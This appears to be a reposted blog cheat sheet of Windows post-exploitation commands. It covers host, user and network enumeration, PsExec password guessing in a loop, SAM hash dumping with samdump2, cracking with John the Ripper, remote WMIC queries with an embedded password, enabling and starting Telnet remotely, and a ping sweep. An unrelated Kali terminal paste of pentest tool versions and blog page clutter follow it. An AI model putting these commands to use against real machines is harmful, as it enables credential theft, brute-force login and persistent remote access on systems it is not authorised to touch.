Command For Information Gathering Of Windows Post Exploitation

本文介绍了一系列用于收集Windows系统信息的方法和技术,包括如何获取系统基本信息、运行的服务、环境变量、用户信息、网络配置等。此外还介绍了使用特定工具进行密码猜测、哈希提取及破解的过程。
If you want to see all command and results of each command, please go to the Source.

gathering System related information 
C:\>systeminfo 

Running Services
C:\>tasklist /svc 

Installed Services 
C:\>sc query state= all

Current environment settings
C:\>set

Find Username
C:\>set | find "USERNAME"

Find Domain
C:\>set | find "USERDOMAIN" 

Find Current User Information 
C:\>net user John 

Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators
 
Password Guessing with PsExec
Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt 
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula -u Jack -p %i "ipconfig" 2>nul && echo 

***************** %i *****************

Extract Hashes from the sam and system file with samdump2
:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist
# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information
C:\>ipconfig /displaydns

OS Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 
 
Starting telnet service 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep 
C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html
 


─(root㉿kali)-[~/sqlmap] └─# # 检查工具版本 nmap --version # 网络扫描器 msfconsole -v # Metasploit框架 sqlmap --version # SQL注入工具 # 检查工具组 apt list --installed | grep kali-tools Nmap version 7.95 ( https://nmap.org ) Platform: x86_64-pc-linux-gnu Compiled with: liblua-5.4.7 openssl-3.5.3 libssh2-1.11.1 libz-1.3.1 libpcre2-10.46 libpcap-1.10.5 nmap-libdnet-1.12 ipv6 Compiled without: Available nsock engines: epoll poll select Framework Version: 6.4.84-dev 1.9.9#stable WARNING: apt does not have a stable CLI interface. Use with caution in scripts. kali-tools-802-11/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-bluetooth/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-crypto-stego/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-database/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-detect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-forensics/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-fuzzing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-gpu/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-hardware/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-identify/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-information-gathering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-passwords/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-post-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-protect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-recover/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reporting/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-respond/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reverse-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-rfid/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sdr/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sniffing-spoofing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-social-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-voip/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-vulnerability/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-windows-resources/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-wireless/kali-rolling,now 2025.3.2 amd64 [已安装] ┌──(root㉿kali)-[~/sqlmap] └─#
最新发布
09-28
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值